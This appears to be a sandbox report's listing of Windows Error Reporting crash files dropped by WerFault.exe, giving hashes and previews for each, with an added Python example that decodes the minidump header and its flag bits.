                                                      SHA-512:D5E92C5701569EC3690A69498FB98259E29B038259DB3BC3BA79E6CB0359D891E921FDFF7936534C4A78EEBCB5F15B237848B101047966CFC3AEE0A44F845A7F
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.9.6.<./.P.i.d.>.......
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4674
                                                      Entropy (8bit):4.459046662323008
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zs/JgtWI9cSWgc8sqYjl8fm8M4JblMFR4+q8vclCr8MjTzd:uITfh/zgrsqY+JpO4KoCr8MXzd
                                                      MD5:CE66B48F2FA0E2EC80123315D9E63647
                                                      SHA1:16BBB7B300DDC7AB40E865DA2C580A8D97EC571D
                                                      SHA-256:358BD5588CC43D4B704A3AD1D1A5765DB8AECE40B68EDA66A2281382C9F10DB7
                                                      SHA-512:B828CC49806E619D215C07EF3E86FF15C70FE22C655D4C95EF67DEEBDC34BFE69DA34404CD0D8A251289761E1B9A181437EAF39DB58BC8A326D7AC89803D9A8E
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719940" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:29:37 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):79772
                                                      Entropy (8bit):2.034889738534872
                                                      Encrypted:false
                                                      SSDEEP:384:g53AVzuNP/aMX79WveBYXRiOUAkLNpOjHbPz4eMIp:8A6PiMX/ZpOHL
                                                      MD5:69D24884698E29C1B07C217DC406B94D
                                                      SHA1:AE455274D15B4363952AB2C58F5B088498AD87C8
                                                      SHA-256:C2B3187135738D10B8C30169A23FD3582C1719993CDCFC448B25D9B0C9FE1776
                                                      SHA-512:4BB0DE62B1FD1373FE62C99CDC559E7A58CF6F3A92BB9E55E26ADDAE334FF087615F1837CF3F410B6AC5BD77BAF4F884EF5157AF096CC055FF6589432D66642B
                                                      Malicious:false
                                                      Preview:MDMP....... .......q~;c........................4...........t....7..........T.......8...........T...........p...,............................................................................................U...........B......D.......GenuineIntelW...........T.......|...h~;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8388
                                                      Entropy (8bit):3.6978331467436165
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi/CY6HE6YBSISU1mDgmf6TS4CpB/89bSysfnGm:RrlsNi16k6YBtSU1mDgmf+SiSxfv
                                                      MD5:2909A37000F660E6F35297AF5CB51A3D
                                                      SHA1:7EACD8016D73934A33B797F324E75EBDEED9A492
                                                      SHA-256:D07E71CC065F365647EC07D2C8D2F9C880B42BF83893193761CE0110D768DE7A
                                                      SHA-512:1BAF84F17AA64ED3B99A8AA1BD4C75F029A8296CD056B593A262DE50EAA8506A09FE9B5D670FA143BE4F5F1A89943533B5724CF925BE10CD8F35A743435603B1
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.9.6.<./.P.i.d.>.......
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4674
                                                      Entropy (8bit):4.456177032053052
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zs/JgtWI9cSWgc8sqYjF+8fm8M4JblMFq+q8vclCr8MjTzd:uITfh/zgrsqY9JpPKoCr8MXzd
                                                      MD5:1241181971C0E7209595F7212BCB895E
                                                      SHA1:A4048560C9E5C7AFED6260F23CEE7ACF9FEC9F2F
                                                      SHA-256:9F5CB209411A8E4A7E837DB074385AFF772FA20FF076E09526D1A2A0175D1823
                                                      SHA-512:5434CF3024C5931C95D52788B6C74D8F55DE70EEE7F600A1BC6CB20484EFA94C9E633B56E05F099BC2F61C10FB19CD08849CA9A73BE0AB4A6F9DF41E23423F6F
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719940" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:29:40 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):79232
                                                      Entropy (8bit):2.047001762531174
                                                      Encrypted:false
                                                      SSDEEP:384:/oAVzNP/VYdpQ/7YXlROUAkLNpOjHbVzUsWR7OY:gAjPR/QZpOHBWR7
                                                      MD5:5889568BE023C2B7139D34B63094C03E
                                                      SHA1:1B22C65041EAD8B2AABD74C2263348019E7DB2F7
                                                      SHA-256:4356A4D4C5C655691FFF357DA4BF0DE00C054CDE6810848079E6C21E71A99FB5
                                                      SHA-512:FB7075A19AF49C0B626256D1AC6A08D6BD08FB60576CA8E30B6170BE73F91F2CA3D5E4CED1C53CC7D8F821B4282A06F86500D2025F6253BD63A1238445C6B29D
                                                      Malicious:false
                                                      Preview:MDMP....... .......t~;c........................4................7..........T.......8...........T...........p................................................................................................U...........B......D.......GenuineIntelW...........T.......|...h~;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
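The "File Type" line above ("Mini DuMP crash report, 14 streams, Tue Oct 4 00:29:40 2022, 0x1205a4 type") is libmagic reading the fixed 32-byte MINIDUMP_HEADER at the start of the dump: NumberOfStreams at offset 8, TimeDateStamp at offset 20 and the 64-bit MINIDUMP_TYPE flags at offset 24. The four printable characters "t~;c" in the preview are that timestamp, 0x633b7e74 little-endian. The following Python is an added example, not part of the Joe Sandbox report, that reproduces the identification from the raw bytes and expands 0x1205a4 into its MINIDUMP_TYPE flag names; the sample input is constructed here from the values the report shows (header fields copied, stream directory zero-filled as a placeholder), not taken from the real dropped file.

```python
"""Parse a MINIDUMP_HEADER and decode its MINIDUMP_TYPE flags.

Added example for the WerFault.exe minidumps listed in this report. The
sample bytes are constructed from the report's header values; the real
dump is 79232 bytes and carries a populated stream directory.
"""
import struct
from datetime import datetime, timezone

# MINIDUMP_HEADER (minidumpapiset.h): Signature, Version, NumberOfStreams,
# StreamDirectoryRva, CheckSum, TimeDateStamp (u32 epoch), Flags (u64).
HEADER_FMT = "<4sIIIIIQ"
HEADER_SIZE = struct.calcsize(HEADER_FMT)        # 32 bytes
# MINIDUMP_DIRECTORY: StreamType, DataSize, Rva (all u32).
DIRECTORY_FMT = "<III"
DIRECTORY_SIZE = struct.calcsize(DIRECTORY_FMT)  # 12 bytes
MINIDUMP_SIGNATURE = b"MDMP"
MINIDUMP_VERSION = 0xA793                        # low 16 bits of Version

# MINIDUMP_TYPE bits (minidumpapiset.h); only those needed for 0x1205a4
# plus the other documented low bits are listed.
MINIDUMP_TYPE = {
    0x00000001: "MiniDumpWithDataSegs",
    0x00000002: "MiniDumpWithFullMemory",
    0x00000004: "MiniDumpWithHandleData",
    0x00000008: "MiniDumpFilterMemory",
    0x00000010: "MiniDumpScanMemory",
    0x00000020: "MiniDumpWithUnloadedModules",
    0x00000040: "MiniDumpWithIndirectlyReferencedMemory",
    0x00000080: "MiniDumpFilterModulePaths",
    0x00000100: "MiniDumpWithProcessThreadData",
    0x00000200: "MiniDumpWithPrivateReadWriteMemory",
    0x00000400: "MiniDumpWithoutOptionalData",
    0x00000800: "MiniDumpWithFullMemoryInfo",
    0x00001000: "MiniDumpWithThreadInfo",
    0x00002000: "MiniDumpWithCodeSegs",
    0x00004000: "MiniDumpWithoutAuxiliaryState",
    0x00008000: "MiniDumpWithFullAuxiliaryState",
    0x00010000: "MiniDumpWithPrivateWriteCopyMemory",
    0x00020000: "MiniDumpIgnoreInaccessibleMemory",
    0x00040000: "MiniDumpWithTokenInformation",
    0x00080000: "MiniDumpWithModuleHeaders",
    0x00100000: "MiniDumpFilterTriage",
}


def decode_flags(flags: int) -> list:
    """Return the MINIDUMP_TYPE names set in flags, lowest bit first."""
    names = [name for bit, name in sorted(MINIDUMP_TYPE.items()) if flags & bit]
    unknown = flags & ~sum(MINIDUMP_TYPE)
    if unknown:
        names.append("0x%x (unknown)" % unknown)
    return names


def parse_header(data: bytes) -> dict:
    """Validate the header and return its fields; raise ValueError if it is not a minidump."""
    if len(data) < HEADER_SIZE:
        raise ValueError("truncated: %d bytes, need %d" % (len(data), HEADER_SIZE))
    sig, version, nstreams, dir_rva, checksum, ts, flags = struct.unpack_from(HEADER_FMT, data, 0)
    if sig != MINIDUMP_SIGNATURE:
        raise ValueError("bad signature %r" % sig)
    if (version & 0xFFFF) != MINIDUMP_VERSION:
        raise ValueError("unexpected minidump version 0x%04x" % (version & 0xFFFF))
    # A directory that runs past EOF means a truncated or tampered dump.
    directory_end = dir_rva + nstreams * DIRECTORY_SIZE
    return {
        "streams": nstreams,
        "directory_rva": dir_rva,
        "directory_in_bounds": directory_end <= len(data),
        "checksum": checksum,
        "timestamp": datetime.fromtimestamp(ts, timezone.utc),
        "flags": flags,
        "flag_names": decode_flags(flags),
    }


def list_directory(data: bytes) -> list:
    """Return (StreamType, DataSize, Rva) for each directory entry."""
    hdr = parse_header(data)
    if not hdr["directory_in_bounds"]:
        raise ValueError("stream directory lies outside the file")
    return [struct.unpack_from(DIRECTORY_FMT, data, hdr["directory_rva"] + i * DIRECTORY_SIZE)
            for i in range(hdr["streams"])]


def summarize(data: bytes) -> str:
    """Render the header the way libmagic's 'Mini DuMP crash report' line does."""
    h = parse_header(data)
    when = h["timestamp"].strftime("%a %b %d %H:%M:%S %Y UTC")
    return "Mini DuMP crash report, %d streams, %s, 0x%x type" % (h["streams"], when, h["flags"])


# Constructed sample: header values from the report's 00:29:40 dump
# (14 streams, TimeDateStamp 0x633b7e74 = bytes "t~;c", flags 0x1205a4),
# followed by a zero-filled placeholder directory so the bounds check passes.
SAMPLE_DUMP = struct.pack(HEADER_FMT, MINIDUMP_SIGNATURE, MINIDUMP_VERSION, 14,
                          HEADER_SIZE, 0, 0x633B7E74, 0x1205A4) + bytes(14 * DIRECTORY_SIZE)

if __name__ == "__main__":
    print(summarize(SAMPLE_DUMP))
    for name in parse_header(SAMPLE_DUMP)["flag_names"]:
        print("  ", name)
```

Run against the real dropped file, the summary line should match the report's "File Type" field and the directory listing shows which streams (SystemInfo, ThreadList, ModuleList, Exception, memory lists) WerFault actually included; 0x1205a4 is the triage-style set (FilterTriage, IgnoreInaccessibleMemory, WithoutOptionalData, WithProcessThreadData, FilterModulePaths, WithUnloadedModules, WithHandleData), which is why these dumps are under 120 KB and will not contain the full memory of the crashed process.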
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8390
                                                      Entropy (8bit):3.696365507955807
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi/CU6h6YBSMSUwZsgmf6TS4CpB489b6ysfiem:RrlsNiB6h6YB5SUwZsgmf+Sn6xfS
                                                      MD5:8533C5AC5D3E2A6F679A630B3662CD90
                                                      SHA1:C948C715817706D4256E3E2675FC4AA5496B7647
                                                      SHA-256:55CE3857ED274E1B02495607872F29F991259FED887A3B9B96ADD1D1BCBF5182
                                                      SHA-512:DD847BDD9579F3120E77CDF7DCD7E3CA226E1FA624A2FBB9579974812B462254A47E3462CB53F8912926645D58B1974370770A70A4D2ED42F9A5FE92387E36C1
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.9.6.<./.P.i.d.>.......
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4674
                                                      Entropy (8bit):4.455930032015156
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zs/JgtWI9cSWgc8sqYjw8fm8M4JblMFip+q8vclCr8MjTzd:uITfh/zgrsqYRJpvpKoCr8MXzd
                                                      MD5:B2D79BA2BCA0AE271D72B41D2B5D2FBE
                                                      SHA1:A04E362A7EFA55A5A4F2C364B68C814AF834CAF6
                                                      SHA-256:6A2AEEE43C75328C413F85C505D4D2D4F4EB51D1DA036EFA2ED2A49A8C47BCC7
                                                      SHA-512:2D1C9912F69166BE1701D7A257E54307B39D7261CB4A302CF9DD3D33B6C0FBEF7DA77031350BF88A4F5D90E040F64F896A5E526657865C45D28C93406462CB9D
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719940" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:29:43 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):79244
                                                      Entropy (8bit):2.0831035534929656
                                                      Encrypted:false
                                                      SSDEEP:384:sJ9AVzihPHGUgmYXcYO6f69K+aAkLNpOjHbyHzkH08nP1:sfAghPmUgv9dZpOHyEb1
                                                      MD5:7D03634D16CD0A056B0289167A5080C5
                                                      SHA1:45A6C0D3AF04BAC072E7157223859EA170A0A7FD
                                                      SHA-256:FFEA123BBB69383F4DBDE9DC50F45736F074413EC5D9EA47BA899DFAFB27010E
                                                      SHA-512:8422A1767A7BD94DC15FB9041998BBFFCC8232AF3F6BCE937AA9CBF69014C9BAD6C8450687FA928E27132B14862DAF004CDB07BE8DAE30FD7424C37C9A028276
                                                      Malicious:false
                                                      Preview:MDMP....... .......w~;c........................4...........t....7..........T.......8...........T............................................................................................................U...........B......D.......GenuineIntelW...........T.......|...h~;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8390
                                                      Entropy (8bit):3.69655114069675
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi/CX6D6YBSLSUg/ygmf6TS4CpB789beysf46Wqm:RrlsNiC6D6YBeSU1gmf+S+exf46y
                                                      MD5:1B909C937B151BD3842E8B0600B9D6C1
                                                      SHA1:AB600C9CD2861ADEE504C70E2EF3EFC7AE7741A6
                                                      SHA-256:22FDB7BC86C31FB7E034CE84C92C17081D9AB918BFA74C8EAC75FF062A3FC9E5
                                                      SHA-512:5F8C4DB3624EA1190342A17360DBDD786EE68D7E9DE698AA5548AD726CB6F859772113472598706452304C871834B1AC29144F137E591E0DB24C18FB7A45970D
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.9.6.<./.P.i.d.>.......
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:30:52 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):115316
                                                      Entropy (8bit):2.072510660517891
                                                      Encrypted:false
                                                      SSDEEP:384:acmvCLbPD7bV444RLH54twYXmxOYc1vrNLNROjHwUeKs4zZHQLzbeOjuMiloD:hbPDHV54v4tz1vhZROMHn65g
                                                      MD5:0E171C8E023BAF9AFA2A47F1801C9687
                                                      SHA1:7ED53AD0A6A54E7AD1DB239B3A0B02AE0E44DFED
                                                      SHA-256:729D072AF447D030D160583689A731A30C9AE89BBEB74C0AFE5D5DC639628B70
                                                      SHA-512:0025821F5FF48551754D06B877F1A324D33DA128263AE862AAD3DEAC531E99ED45A1B12979F5A03EC481C54CE1385BA18EC88B5ABBF48E59D6D01B4A64D74C9B
                                                      Malicious:false
                                                      Preview:MDMP....... ........~;c............D...............L............N..........T.......8...........T...........P=..$...........\!..........H#...................................................................U...........B.......#......GenuineIntelW...........T.......|...h~;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4674
                                                      Entropy (8bit):4.458779439734889
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zs/JgtWI9cSWgc8sqYjb8fm8M4JblMF9w+q8vclCr8MjTzd:uITfh/zgrsqYMJpOwKoCr8MXzd
                                                      MD5:6FC280E101469D3EC90CF2839259B200
                                                      SHA1:BD90383C3E3684BE029872488E632CBD7FCA733F
                                                      SHA-256:B72737167A3108C3D2C6DD64EF4C228929668CEC5FF479E83BB94157F7B16AA3
                                                      SHA-512:9AD63E71C2C7A7BB3E7D4903230346F5052FF23D454AC3E5B6D9D97AAB3B6CD945FB68BB583FB56C4C7C3C58477A20FA1EEF037C72EE29304F213E0E3B4807D7
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719940" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8404
                                                      Entropy (8bit):3.694330330368768
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi/Cj6Xj6YBSPSUqgmf6oSR1sCpBm89bpysfbDm:RrlsNiW6Xj6YB6SUqgmf5ST5pxfO
                                                      MD5:B656135048B204116DC5FFA2D958977F
                                                      SHA1:6B3BABEAD4636FF1B48A8992EF31FF1ACD91AAD8
                                                      SHA-256:D8ADFF43F5130C3773E14A2ADBD852938A739F7A39B587748B6481CF7D34A58A
                                                      SHA-512:4FD8EB649D011087C9070D0672F26C26A488047674A36A79FE97298BF1C3A0493B15F8A7ADDAAB7A09A6378F3CF141AE137BC35DFF141CA3418AAD8368638316
                                                      Malicious:false
